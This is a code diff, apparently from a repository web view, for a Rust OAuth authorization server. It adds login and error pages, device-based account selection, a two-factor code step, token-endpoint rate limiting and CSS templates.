axum::http::StatusCode::BAD_REQUEST,
|
||||
Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("Invalid or expired request_uri. Please start a new authorization request."),
|
||||
)),
|
||||
).into_response();
|
||||
}
|
||||
Err(e) => {
|
||||
if wants_json(&headers) {
|
||||
return (
|
||||
axum::http::StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Json(serde_json::json!({
|
||||
"error": "server_error",
|
||||
"error_description": format!("Database error: {:?}", e)
|
||||
})),
|
||||
).into_response();
|
||||
}
|
||||
return (
|
||||
axum::http::StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Html(templates::error_page(
|
||||
"server_error",
|
||||
Some(&format!("Database error: {:?}", e)),
|
||||
)),
|
||||
).into_response();
|
||||
}
|
||||
};
|
||||
|
||||
if request_data.expires_at < Utc::now() {
|
||||
let _ = db::delete_authorization_request(&state.db, &request_uri).await;
|
||||
if wants_json(&headers) {
|
||||
return (
|
||||
axum::http::StatusCode::BAD_REQUEST,
|
||||
Json(serde_json::json!({
|
||||
"error": "invalid_request",
|
||||
"error_description": "Authorization request has expired. Please start a new request."
|
||||
})),
|
||||
).into_response();
|
||||
}
|
||||
return (
|
||||
axum::http::StatusCode::BAD_REQUEST,
|
||||
Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("Authorization request has expired. Please start a new request."),
|
||||
)),
|
||||
).into_response();
|
||||
}
|
||||
|
||||
if wants_json(&headers) {
|
||||
return Json(AuthorizeResponse {
|
||||
client_id: request_data.parameters.client_id.clone(),
|
||||
client_name: None,
|
||||
scope: request_data.parameters.scope.clone(),
|
||||
redirect_uri: request_data.parameters.redirect_uri.clone(),
|
||||
state: request_data.parameters.state.clone(),
|
||||
login_hint: request_data.parameters.login_hint.clone(),
|
||||
}).into_response();
|
||||
}
|
||||
|
||||
let force_new_account = query.new_account.unwrap_or(false);
|
||||
|
||||
if !force_new_account {
|
||||
if let Some(device_id) = extract_device_cookie(&headers) {
|
||||
if let Ok(accounts) = db::get_device_accounts(&state.db, &device_id).await {
|
||||
if !accounts.is_empty() {
|
||||
let device_accounts: Vec<DeviceAccount> = accounts
|
||||
.into_iter()
|
||||
.map(|row| DeviceAccount {
|
||||
did: row.did,
|
||||
handle: row.handle,
|
||||
email: row.email,
|
||||
last_used_at: row.last_used_at,
|
||||
})
|
||||
.collect();
|
||||
|
||||
return Html(templates::account_selector_page(
|
||||
&request_data.parameters.client_id,
|
||||
None,
|
||||
&request_uri,
|
||||
&device_accounts,
|
||||
)).into_response();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Html(templates::login_page(
|
||||
&request_data.parameters.client_id,
|
||||
None,
|
||||
request_data.parameters.scope.as_deref(),
|
||||
&request_uri,
|
||||
None,
|
||||
request_data.parameters.login_hint.as_deref(),
|
||||
)).into_response()
|
||||
}
|
||||
|
||||
pub async fn authorize_get_json(
|
||||
State(state): State<AppState>,
|
||||
Query(query): Query<AuthorizeQuery>,
|
||||
) -> Result<Json<AuthorizeResponse>, OAuthError> {
|
||||
@@ -92,19 +269,85 @@ pub async fn authorize_post(
|
||||
State(state): State<AppState>,
|
||||
headers: HeaderMap,
|
||||
Form(form): Form<AuthorizeSubmit>,
|
||||
) -> Result<Response, OAuthError> {
|
||||
let request_data = db::get_authorization_request(&state.db, &form.request_uri)
|
||||
.await?
|
||||
.ok_or_else(|| OAuthError::InvalidRequest("Invalid or expired request_uri".to_string()))?;
|
||||
) -> Response {
|
||||
let json_response = wants_json(&headers);
|
||||
|
||||
let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await {
|
||||
Ok(Some(data)) => data,
|
||||
Ok(None) => {
|
||||
if json_response {
|
||||
return (
|
||||
axum::http::StatusCode::BAD_REQUEST,
|
||||
Json(serde_json::json!({
|
||||
"error": "invalid_request",
|
||||
"error_description": "Invalid or expired request_uri."
|
||||
})),
|
||||
).into_response();
|
||||
}
|
||||
return Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("Invalid or expired request_uri. Please start a new authorization request."),
|
||||
)).into_response();
|
||||
}
|
||||
Err(e) => {
|
||||
if json_response {
|
||||
return (
|
||||
axum::http::StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Json(serde_json::json!({
|
||||
"error": "server_error",
|
||||
"error_description": format!("Database error: {:?}", e)
|
||||
})),
|
||||
).into_response();
|
||||
}
|
||||
return Html(templates::error_page(
|
||||
"server_error",
|
||||
Some(&format!("Database error: {:?}", e)),
|
||||
)).into_response();
|
||||
}
|
||||
};
|
||||
|
||||
if request_data.expires_at < Utc::now() {
|
||||
db::delete_authorization_request(&state.db, &form.request_uri).await?;
|
||||
return Err(OAuthError::InvalidRequest("request_uri has expired".to_string()));
|
||||
let _ = db::delete_authorization_request(&state.db, &form.request_uri).await;
|
||||
if json_response {
|
||||
return (
|
||||
axum::http::StatusCode::BAD_REQUEST,
|
||||
Json(serde_json::json!({
|
||||
"error": "invalid_request",
|
||||
"error_description": "Authorization request has expired."
|
||||
})),
|
||||
).into_response();
|
||||
}
|
||||
return Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("Authorization request has expired. Please start a new request."),
|
||||
)).into_response();
|
||||
}
|
||||
|
||||
let user = sqlx::query!(
|
||||
let show_login_error = |error_msg: &str, json: bool| -> Response {
|
||||
if json {
|
||||
return (
|
||||
axum::http::StatusCode::FORBIDDEN,
|
||||
Json(serde_json::json!({
|
||||
"error": "access_denied",
|
||||
"error_description": error_msg
|
||||
})),
|
||||
).into_response();
|
||||
}
|
||||
Html(templates::login_page(
|
||||
&request_data.parameters.client_id,
|
||||
None,
|
||||
request_data.parameters.scope.as_deref(),
|
||||
&form.request_uri,
|
||||
Some(error_msg),
|
||||
Some(&form.username),
|
||||
)).into_response()
|
||||
};
|
||||
|
||||
let user = match sqlx::query!(
|
||||
r#"
|
||||
SELECT did, password_hash, deactivated_at, takedown_ref
|
||||
SELECT id, did, email, password_hash, two_factor_enabled,
|
||||
preferred_notification_channel as "preferred_notification_channel: NotificationChannel",
|
||||
deactivated_at, takedown_ref
|
||||
FROM users
|
||||
WHERE handle = $1 OR email = $1
|
||||
"#,
|
||||
@@ -112,65 +355,277 @@ pub async fn authorize_post(
|
||||
)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
.map_err(|e| OAuthError::ServerError(e.to_string()))?
|
||||
.ok_or_else(|| OAuthError::AccessDenied("Invalid credentials".to_string()))?;
|
||||
{
|
||||
Ok(Some(u)) => u,
|
||||
Ok(None) => return show_login_error("Invalid handle/email or password.", json_response),
|
||||
Err(_) => return show_login_error("An error occurred. Please try again.", json_response),
|
||||
};
|
||||
|
||||
if user.deactivated_at.is_some() {
|
||||
return Err(OAuthError::AccessDenied("Account is deactivated".to_string()));
|
||||
return show_login_error("This account has been deactivated.", json_response);
|
||||
}
|
||||
|
||||
if user.takedown_ref.is_some() {
|
||||
return Err(OAuthError::AccessDenied("Account is taken down".to_string()));
|
||||
return show_login_error("This account has been taken down.", json_response);
|
||||
}
|
||||
|
||||
let password_valid = bcrypt::verify(&form.password, &user.password_hash)
|
||||
.map_err(|_| OAuthError::ServerError("Password verification failed".to_string()))?;
|
||||
let password_valid = match bcrypt::verify(&form.password, &user.password_hash) {
|
||||
Ok(valid) => valid,
|
||||
Err(_) => return show_login_error("An error occurred. Please try again.", json_response),
|
||||
};
|
||||
|
||||
if !password_valid {
|
||||
return Err(OAuthError::AccessDenied("Invalid credentials".to_string()));
|
||||
return show_login_error("Invalid handle/email or password.", json_response);
|
||||
}
|
||||
|
||||
if user.two_factor_enabled {
|
||||
let _ = db::delete_2fa_challenge_by_request_uri(&state.db, &form.request_uri).await;
|
||||
|
||||
match db::create_2fa_challenge(&state.db, &user.did, &form.request_uri).await {
|
||||
Ok(challenge) => {
|
||||
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
|
||||
if let Err(e) = enqueue_2fa_code(
|
||||
&state.db,
|
||||
user.id,
|
||||
&challenge.code,
|
||||
&hostname,
|
||||
).await {
|
||||
tracing::warn!(
|
||||
did = %user.did,
|
||||
error = %e,
|
||||
"Failed to enqueue 2FA notification"
|
||||
);
|
||||
}
|
||||
|
||||
let channel_name = channel_display_name(user.preferred_notification_channel);
|
||||
let redirect_url = format!(
|
||||
"/oauth/authorize/2fa?request_uri={}&channel={}",
|
||||
url_encode(&form.request_uri),
|
||||
url_encode(channel_name)
|
||||
);
|
||||
return Redirect::temporary(&redirect_url).into_response();
|
||||
}
|
||||
Err(_) => {
|
||||
return show_login_error("An error occurred. Please try again.", json_response);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
let code = Code::generate();
|
||||
let mut device_id: Option<String> = None;
|
||||
let mut device_id: Option<String> = extract_device_cookie(&headers);
|
||||
let mut new_cookie: Option<String> = None;
|
||||
|
||||
if form.remember_device {
|
||||
let new_device_id = DeviceId::generate();
|
||||
let device_data = DeviceData {
|
||||
session_id: SessionId::generate().0,
|
||||
user_agent: extract_user_agent(&headers),
|
||||
ip_address: extract_client_ip(&headers),
|
||||
last_seen_at: Utc::now(),
|
||||
let final_device_id = if let Some(existing_id) = &device_id {
|
||||
existing_id.clone()
|
||||
} else {
|
||||
let new_id = DeviceId::generate();
|
||||
let device_data = DeviceData {
|
||||
session_id: SessionId::generate().0,
|
||||
user_agent: extract_user_agent(&headers),
|
||||
ip_address: extract_client_ip(&headers),
|
||||
last_seen_at: Utc::now(),
|
||||
};
|
||||
|
||||
if db::create_device(&state.db, &new_id.0, &device_data).await.is_ok() {
|
||||
new_cookie = Some(make_device_cookie(&new_id.0));
|
||||
device_id = Some(new_id.0.clone());
|
||||
}
|
||||
new_id.0
|
||||
};
|
||||
|
||||
db::create_device(&state.db, &new_device_id.0, &device_data).await?;
|
||||
db::upsert_account_device(&state.db, &user.did, &new_device_id.0).await?;
|
||||
device_id = Some(new_device_id.0);
|
||||
let _ = db::upsert_account_device(&state.db, &user.did, &final_device_id).await;
|
||||
}
|
||||
|
||||
db::update_authorization_request(
|
||||
if let Err(_) = db::update_authorization_request(
|
||||
&state.db,
|
||||
&form.request_uri,
|
||||
&user.did,
|
||||
device_id.as_deref(),
|
||||
&code.0,
|
||||
)
|
||||
.await?;
|
||||
.await
|
||||
{
|
||||
return show_login_error("An error occurred. Please try again.", json_response);
|
||||
}
|
||||
|
||||
let redirect_uri = &request_data.parameters.redirect_uri;
|
||||
let redirect_url = build_success_redirect(
|
||||
&request_data.parameters.redirect_uri,
|
||||
&code.0,
|
||||
request_data.parameters.state.as_deref(),
|
||||
);
|
||||
|
||||
let redirect = Redirect::temporary(&redirect_url);
|
||||
|
||||
if let Some(cookie) = new_cookie {
|
||||
([(SET_COOKIE, cookie)], redirect).into_response()
|
||||
} else {
|
||||
redirect.into_response()
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn authorize_select(
|
||||
State(state): State<AppState>,
|
||||
headers: HeaderMap,
|
||||
Form(form): Form<AuthorizeSelectSubmit>,
|
||||
) -> Response {
|
||||
let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await {
|
||||
Ok(Some(data)) => data,
|
||||
Ok(None) => {
|
||||
return Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("Invalid or expired request_uri. Please start a new authorization request."),
|
||||
)).into_response();
|
||||
}
|
||||
Err(_) => {
|
||||
return Html(templates::error_page(
|
||||
"server_error",
|
||||
Some("An error occurred. Please try again."),
|
||||
)).into_response();
|
||||
}
|
||||
};
|
||||
|
||||
if request_data.expires_at < Utc::now() {
|
||||
let _ = db::delete_authorization_request(&state.db, &form.request_uri).await;
|
||||
return Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("Authorization request has expired. Please start a new request."),
|
||||
)).into_response();
|
||||
}
|
||||
|
||||
let device_id = match extract_device_cookie(&headers) {
|
||||
Some(id) => id,
|
||||
None => {
|
||||
return Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("No device session found. Please sign in."),
|
||||
)).into_response();
|
||||
}
|
||||
};
|
||||
|
||||
let account_valid = match db::verify_account_on_device(&state.db, &device_id, &form.did).await {
|
||||
Ok(valid) => valid,
|
||||
Err(_) => {
|
||||
return Html(templates::error_page(
|
||||
"server_error",
|
||||
Some("An error occurred. Please try again."),
|
||||
)).into_response();
|
||||
}
|
||||
};
|
||||
|
||||
if !account_valid {
|
||||
return Html(templates::error_page(
|
||||
"access_denied",
|
||||
Some("This account is not available on this device. Please sign in."),
|
||||
)).into_response();
|
||||
}
|
||||
|
||||
let user = match sqlx::query!(
|
||||
r#"
|
||||
SELECT id, two_factor_enabled,
|
||||
preferred_notification_channel as "preferred_notification_channel: NotificationChannel"
|
||||
FROM users
|
||||
WHERE did = $1
|
||||
"#,
|
||||
form.did
|
||||
)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
{
|
||||
Ok(Some(u)) => u,
|
||||
Ok(None) => {
|
||||
return Html(templates::error_page(
|
||||
"access_denied",
|
||||
Some("Account not found. Please sign in."),
|
||||
)).into_response();
|
||||
}
|
||||
Err(_) => {
|
||||
return Html(templates::error_page(
|
||||
"server_error",
|
||||
Some("An error occurred. Please try again."),
|
||||
)).into_response();
|
||||
}
|
||||
};
|
||||
|
||||
if user.two_factor_enabled {
|
||||
let _ = db::delete_2fa_challenge_by_request_uri(&state.db, &form.request_uri).await;
|
||||
|
||||
match db::create_2fa_challenge(&state.db, &form.did, &form.request_uri).await {
|
||||
Ok(challenge) => {
|
||||
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
|
||||
if let Err(e) = enqueue_2fa_code(
|
||||
&state.db,
|
||||
user.id,
|
||||
&challenge.code,
|
||||
&hostname,
|
||||
).await {
|
||||
tracing::warn!(
|
||||
did = %form.did,
|
||||
error = %e,
|
||||
"Failed to enqueue 2FA notification"
|
||||
);
|
||||
}
|
||||
|
||||
let channel_name = channel_display_name(user.preferred_notification_channel);
|
||||
let redirect_url = format!(
|
||||
"/oauth/authorize/2fa?request_uri={}&channel={}",
|
||||
url_encode(&form.request_uri),
|
||||
url_encode(channel_name)
|
||||
);
|
||||
return Redirect::temporary(&redirect_url).into_response();
|
||||
}
|
||||
Err(_) => {
|
||||
return Html(templates::error_page(
|
||||
"server_error",
|
||||
Some("An error occurred. Please try again."),
|
||||
)).into_response();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
let _ = db::upsert_account_device(&state.db, &form.did, &device_id).await;
|
||||
|
||||
let code = Code::generate();
|
||||
|
||||
if let Err(_) = db::update_authorization_request(
|
||||
&state.db,
|
||||
&form.request_uri,
|
||||
&form.did,
|
||||
Some(&device_id),
|
||||
&code.0,
|
||||
)
|
||||
.await
|
||||
{
|
||||
return Html(templates::error_page(
|
||||
"server_error",
|
||||
Some("An error occurred. Please try again."),
|
||||
)).into_response();
|
||||
}
|
||||
|
||||
let redirect_url = build_success_redirect(
|
||||
&request_data.parameters.redirect_uri,
|
||||
&code.0,
|
||||
request_data.parameters.state.as_deref(),
|
||||
);
|
||||
|
||||
Redirect::temporary(&redirect_url).into_response()
|
||||
}
|
||||
|
||||
fn build_success_redirect(redirect_uri: &str, code: &str, state: Option<&str>) -> String {
|
||||
let mut redirect_url = redirect_uri.to_string();
|
||||
|
||||
let separator = if redirect_url.contains('?') { '&' } else { '?' };
|
||||
redirect_url.push(separator);
|
||||
redirect_url.push_str(&format!("code={}", url_encode(&code.0)));
|
||||
redirect_url.push_str(&format!("code={}", url_encode(code)));
|
||||
|
||||
if let Some(state) = &request_data.parameters.state {
|
||||
redirect_url.push_str(&format!("&state={}", url_encode(state)));
|
||||
if let Some(req_state) = state {
|
||||
redirect_url.push_str(&format!("&state={}", url_encode(req_state)));
|
||||
}
|
||||
|
||||
let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
|
||||
redirect_url.push_str(&format!("&iss={}", url_encode(&format!("https://{}", pds_hostname))));
|
||||
|
||||
Ok(Redirect::temporary(&redirect_url).into_response())
|
||||
redirect_url
|
||||
}
|
||||
|
||||
#[derive(Debug, Serialize)]
|
||||
@@ -208,3 +663,191 @@ pub async fn authorize_deny(
|
||||
pub struct AuthorizeDenyForm {
|
||||
pub request_uri: String,
|
||||
}
|
||||
|
||||
#[derive(Debug, Deserialize)]
|
||||
pub struct Authorize2faQuery {
|
||||
pub request_uri: String,
|
||||
pub channel: Option<String>,
|
||||
}
|
||||
|
||||
#[derive(Debug, Deserialize)]
|
||||
pub struct Authorize2faSubmit {
|
||||
pub request_uri: String,
|
||||
pub code: String,
|
||||
}
|
||||
|
||||
const MAX_2FA_ATTEMPTS: i32 = 5;
|
||||
|
||||
pub async fn authorize_2fa_get(
|
||||
State(state): State<AppState>,
|
||||
Query(query): Query<Authorize2faQuery>,
|
||||
) -> Response {
|
||||
let challenge = match db::get_2fa_challenge(&state.db, &query.request_uri).await {
|
||||
Ok(Some(c)) => c,
|
||||
Ok(None) => {
|
||||
return Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("No 2FA challenge found. Please start over."),
|
||||
)).into_response();
|
||||
}
|
||||
Err(_) => {
|
||||
return Html(templates::error_page(
|
||||
"server_error",
|
||||
Some("An error occurred. Please try again."),
|
||||
)).into_response();
|
||||
}
|
||||
};
|
||||
|
||||
if challenge.expires_at < Utc::now() {
|
||||
let _ = db::delete_2fa_challenge(&state.db, challenge.id).await;
|
||||
return Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("2FA code has expired. Please start over."),
|
||||
)).into_response();
|
||||
}
|
||||
|
||||
let _request_data = match db::get_authorization_request(&state.db, &query.request_uri).await {
|
||||
Ok(Some(d)) => d,
|
||||
Ok(None) => {
|
||||
return Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("Authorization request not found. Please start over."),
|
||||
)).into_response();
|
||||
}
|
||||
Err(_) => {
|
||||
return Html(templates::error_page(
|
||||
"server_error",
|
||||
Some("An error occurred. Please try again."),
|
||||
)).into_response();
|
||||
}
|
||||
};
|
||||
|
||||
let channel = query.channel.as_deref().unwrap_or("email");
|
||||
|
||||
Html(templates::two_factor_page(
|
||||
&query.request_uri,
|
||||
channel,
|
||||
None,
|
||||
)).into_response()
|
||||
}
|
||||
|
||||
pub async fn authorize_2fa_post(
|
||||
State(state): State<AppState>,
|
||||
headers: HeaderMap,
|
||||
Form(form): Form<Authorize2faSubmit>,
|
||||
) -> Response {
|
||||
let challenge = match db::get_2fa_challenge(&state.db, &form.request_uri).await {
|
||||
Ok(Some(c)) => c,
|
||||
Ok(None) => {
|
||||
return Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("No 2FA challenge found. Please start over."),
|
||||
)).into_response();
|
||||
}
|
||||
Err(_) => {
|
||||
return Html(templates::error_page(
|
||||
"server_error",
|
||||
Some("An error occurred. Please try again."),
|
||||
)).into_response();
|
||||
}
|
||||
};
|
||||
|
||||
if challenge.expires_at < Utc::now() {
|
||||
let _ = db::delete_2fa_challenge(&state.db, challenge.id).await;
|
||||
return Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("2FA code has expired. Please start over."),
|
||||
)).into_response();
|
||||
}
|
||||
|
||||
if challenge.attempts >= MAX_2FA_ATTEMPTS {
|
||||
let _ = db::delete_2fa_challenge(&state.db, challenge.id).await;
|
||||
return Html(templates::error_page(
|
||||
"access_denied",
|
||||
Some("Too many failed attempts. Please start over."),
|
||||
)).into_response();
|
||||
}
|
||||
|
||||
let code_valid: bool = form.code.trim().as_bytes().ct_eq(challenge.code.as_bytes()).into();
|
||||
|
||||
if !code_valid {
|
||||
let _ = db::increment_2fa_attempts(&state.db, challenge.id).await;
|
||||
|
||||
let channel = match sqlx::query_scalar!(
|
||||
r#"SELECT preferred_notification_channel as "channel: NotificationChannel" FROM users WHERE did = $1"#,
|
||||
challenge.did
|
||||
)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
{
|
||||
Ok(Some(ch)) => channel_display_name(ch).to_string(),
|
||||
Ok(None) | Err(_) => "email".to_string(),
|
||||
};
|
||||
|
||||
let _request_data = match db::get_authorization_request(&state.db, &form.request_uri).await {
|
||||
Ok(Some(d)) => d,
|
||||
Ok(None) => {
|
||||
return Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("Authorization request not found. Please start over."),
|
||||
)).into_response();
|
||||
}
|
||||
Err(_) => {
|
||||
return Html(templates::error_page(
|
||||
"server_error",
|
||||
Some("An error occurred. Please try again."),
|
||||
)).into_response();
|
||||
}
|
||||
};
|
||||
|
||||
return Html(templates::two_factor_page(
|
||||
&form.request_uri,
|
||||
&channel,
|
||||
Some("Invalid verification code. Please try again."),
|
||||
)).into_response();
|
||||
}
|
||||
|
||||
let _ = db::delete_2fa_challenge(&state.db, challenge.id).await;
|
||||
|
||||
let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await {
|
||||
Ok(Some(d)) => d,
|
||||
Ok(None) => {
|
||||
return Html(templates::error_page(
|
||||
"invalid_request",
|
||||
Some("Authorization request not found."),
|
||||
)).into_response();
|
||||
}
|
||||
Err(_) => {
|
||||
return Html(templates::error_page(
|
||||
"server_error",
|
||||
Some("An error occurred."),
|
||||
)).into_response();
|
||||
}
|
||||
};
|
||||
|
||||
let code = Code::generate();
|
||||
let device_id = extract_device_cookie(&headers);
|
||||
|
||||
if let Err(_) = db::update_authorization_request(
|
||||
&state.db,
|
||||
&form.request_uri,
|
||||
&challenge.did,
|
||||
device_id.as_deref(),
|
||||
&code.0,
|
||||
)
|
||||
.await
|
||||
{
|
||||
return Html(templates::error_page(
|
||||
"server_error",
|
||||
Some("An error occurred. Please try again."),
|
||||
)).into_response();
|
||||
}
|
||||
|
||||
let redirect_url = build_success_redirect(
|
||||
&request_data.parameters.redirect_uri,
|
||||
&code.0,
|
||||
request_data.parameters.state.as_deref(),
|
||||
);
|
||||
|
||||
Redirect::temporary(&redirect_url).into_response()
|
||||
}
|
||||
|
||||
@@ -54,7 +54,7 @@ pub async fn handle_authorization_code_grant(
|
||||
.get(&auth_request.client_id)
|
||||
.await?;
|
||||
let client_auth = auth_request.client_auth.clone().unwrap_or(ClientAuth::None);
|
||||
verify_client_auth(&client_metadata, &client_auth)?;
|
||||
verify_client_auth(&client_metadata_cache, &client_metadata, &client_auth).await?;
|
||||
|
||||
verify_pkce(&auth_request.parameters.code_challenge, &code_verifier)?;
|
||||
|
||||
|
||||
@@ -19,11 +19,35 @@ pub use introspect::{
|
||||
};
|
||||
pub use types::{TokenRequest, TokenResponse};
|
||||
|
||||
fn extract_client_ip(headers: &HeaderMap) -> String {
|
||||
if let Some(forwarded) = headers.get("x-forwarded-for") {
|
||||
if let Ok(value) = forwarded.to_str() {
|
||||
if let Some(first_ip) = value.split(',').next() {
|
||||
return first_ip.trim().to_string();
|
||||
}
|
||||
}
|
||||
}
|
||||
if let Some(real_ip) = headers.get("x-real-ip") {
|
||||
if let Ok(value) = real_ip.to_str() {
|
||||
return value.trim().to_string();
|
||||
}
|
||||
}
|
||||
"unknown".to_string()
|
||||
}
|
||||
|
||||
pub async fn token_endpoint(
|
||||
State(state): State<AppState>,
|
||||
headers: HeaderMap,
|
||||
Form(request): Form<TokenRequest>,
|
||||
) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> {
|
||||
let client_ip = extract_client_ip(&headers);
|
||||
if state.rate_limiters.oauth_token.check_key(&client_ip).is_err() {
|
||||
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
|
||||
return Err(OAuthError::InvalidRequest(
|
||||
"Too many requests. Please try again later.".to_string(),
|
||||
));
|
||||
}
|
||||
|
||||
let dpop_proof = headers
|
||||
.get("DPoP")
|
||||
.and_then(|v| v.to_str().ok())
|
||||
|
||||
@@ -5,8 +5,10 @@ pub mod jwks;
|
||||
pub mod client;
|
||||
pub mod endpoints;
|
||||
pub mod error;
|
||||
pub mod templates;
|
||||
pub mod verify;
|
||||
|
||||
pub use types::*;
|
||||
pub use error::OAuthError;
|
||||
pub use verify::{verify_oauth_access_token, generate_dpop_nonce, VerifyResult, OAuthUser, OAuthAuthError};
|
||||
pub use templates::{DeviceAccount, mask_email};
|
||||
|
||||
719
src/oauth/templates.rs
Normal file
719
src/oauth/templates.rs
Normal file
@@ -0,0 +1,719 @@
|
||||
use chrono::{DateTime, Utc};
|
||||
|
||||
fn base_styles() -> &'static str {
|
||||
r#"
|
||||
:root {
|
||||
--primary: #0085ff;
|
||||
--primary-hover: #0077e6;
|
||||
--primary-contrast: #ffffff;
|
||||
--primary-100: #dbeafe;
|
||||
--primary-400: #60a5fa;
|
||||
--primary-600-30: rgba(37, 99, 235, 0.3);
|
||||
--contrast-0: #ffffff;
|
||||
--contrast-25: #f8f9fa;
|
||||
--contrast-50: #f1f3f5;
|
||||
--contrast-100: #e9ecef;
|
||||
--contrast-200: #dee2e6;
|
||||
--contrast-300: #ced4da;
|
||||
--contrast-400: #adb5bd;
|
||||
--contrast-500: #6b7280;
|
||||
--contrast-600: #4b5563;
|
||||
--contrast-700: #374151;
|
||||
--contrast-800: #1f2937;
|
||||
--contrast-900: #111827;
|
||||
--error: #dc2626;
|
||||
--error-bg: #fef2f2;
|
||||
--success: #059669;
|
||||
--success-bg: #ecfdf5;
|
||||
}
|
||||
|
||||
@media (prefers-color-scheme: dark) {
|
||||
:root {
|
||||
--contrast-0: #111827;
|
||||
--contrast-25: #1f2937;
|
||||
--contrast-50: #374151;
|
||||
--contrast-100: #4b5563;
|
||||
--contrast-200: #6b7280;
|
||||
--contrast-300: #9ca3af;
|
||||
--contrast-400: #d1d5db;
|
||||
--contrast-500: #e5e7eb;
|
||||
--contrast-600: #f3f4f6;
|
||||
--contrast-700: #f9fafb;
|
||||
--contrast-800: #ffffff;
|
||||
--contrast-900: #ffffff;
|
||||
--error-bg: #451a1a;
|
||||
--success-bg: #064e3b;
|
||||
}
|
||||
}
|
||||
|
||||
* {
|
||||
box-sizing: border-box;
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
}
|
||||
|
||||
body {
|
||||
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
|
||||
background: var(--contrast-50);
|
||||
color: var(--contrast-900);
|
||||
min-height: 100vh;
|
||||
display: flex;
|
||||
align-items: center;
|
||||
justify-content: center;
|
||||
padding: 1rem;
|
||||
line-height: 1.5;
|
||||
}
|
||||
|
||||
.container {
|
||||
width: 100%;
|
||||
max-width: 400px;
|
||||
padding-top: 15vh;
|
||||
}
|
||||
|
||||
@media (max-width: 640px) {
|
||||
.container {
|
||||
padding-top: 2rem;
|
||||
}
|
||||
}
|
||||
|
||||
.card {
|
||||
background: var(--contrast-0);
|
||||
border: 1px solid var(--contrast-100);
|
||||
border-radius: 0.75rem;
|
||||
padding: 1.5rem;
|
||||
box-shadow: 0 20px 25px -5px rgba(0, 0, 0, 0.1), 0 8px 10px -6px rgba(0, 0, 0, 0.1);
|
||||
}
|
||||
|
||||
@media (prefers-color-scheme: dark) {
|
||||
.card {
|
||||
box-shadow: 0 20px 25px -5px rgba(0, 0, 0, 0.4), 0 8px 10px -6px rgba(0, 0, 0, 0.3);
|
||||
}
|
||||
}
|
||||
|
||||
h1 {
|
||||
font-size: 1.5rem;
|
||||
font-weight: 600;
|
||||
color: var(--contrast-900);
|
||||
margin-bottom: 0.5rem;
|
||||
}
|
||||
|
||||
.subtitle {
|
||||
color: var(--contrast-500);
|
||||
font-size: 0.875rem;
|
||||
margin-bottom: 1.5rem;
|
||||
}
|
||||
|
||||
.subtitle strong {
|
||||
color: var(--contrast-700);
|
||||
}
|
||||
|
||||
.client-info {
|
||||
background: var(--contrast-25);
|
||||
border-radius: 0.5rem;
|
||||
padding: 1rem;
|
||||
margin-bottom: 1.5rem;
|
||||
}
|
||||
|
||||
.client-info .client-name {
|
||||
font-weight: 500;
|
||||
color: var(--contrast-900);
|
||||
display: block;
|
||||
margin-bottom: 0.25rem;
|
||||
}
|
||||
|
||||
.client-info .scope {
|
||||
color: var(--contrast-500);
|
||||
font-size: 0.875rem;
|
||||
}
|
||||
|
||||
.error-banner {
|
||||
background: var(--error-bg);
|
||||
color: var(--error);
|
||||
border-radius: 0.5rem;
|
||||
padding: 0.75rem 1rem;
|
||||
margin-bottom: 1rem;
|
||||
font-size: 0.875rem;
|
||||
}
|
||||
|
||||
.form-group {
|
||||
margin-bottom: 1.25rem;
|
||||
}
|
||||
|
||||
label {
|
||||
display: block;
|
||||
font-size: 0.875rem;
|
||||
font-weight: 500;
|
||||
color: var(--contrast-700);
|
||||
margin-bottom: 0.375rem;
|
||||
}
|
||||
|
||||
input[type="text"],
|
||||
input[type="email"],
|
||||
input[type="password"] {
|
||||
width: 100%;
|
||||
padding: 0.625rem 0.875rem;
|
||||
border: 2px solid var(--contrast-200);
|
||||
border-radius: 0.375rem;
|
||||
font-size: 1rem;
|
||||
color: var(--contrast-900);
|
||||
background: var(--contrast-0);
|
||||
transition: border-color 0.15s, box-shadow 0.15s;
|
||||
}
|
||||
|
||||
input[type="text"]:focus,
|
||||
input[type="email"]:focus,
|
||||
input[type="password"]:focus {
|
||||
outline: none;
|
||||
border-color: var(--primary);
|
||||
box-shadow: 0 0 0 3px var(--primary-600-30);
|
||||
}
|
||||
|
||||
input[type="text"]::placeholder,
|
||||
input[type="email"]::placeholder,
|
||||
input[type="password"]::placeholder {
|
||||
color: var(--contrast-400);
|
||||
}
|
||||
|
||||
.checkbox-group {
|
||||
display: flex;
|
||||
align-items: center;
|
||||
gap: 0.5rem;
|
||||
margin-bottom: 1.5rem;
|
||||
}
|
||||
|
||||
.checkbox-group input[type="checkbox"] {
|
||||
width: 1.125rem;
|
||||
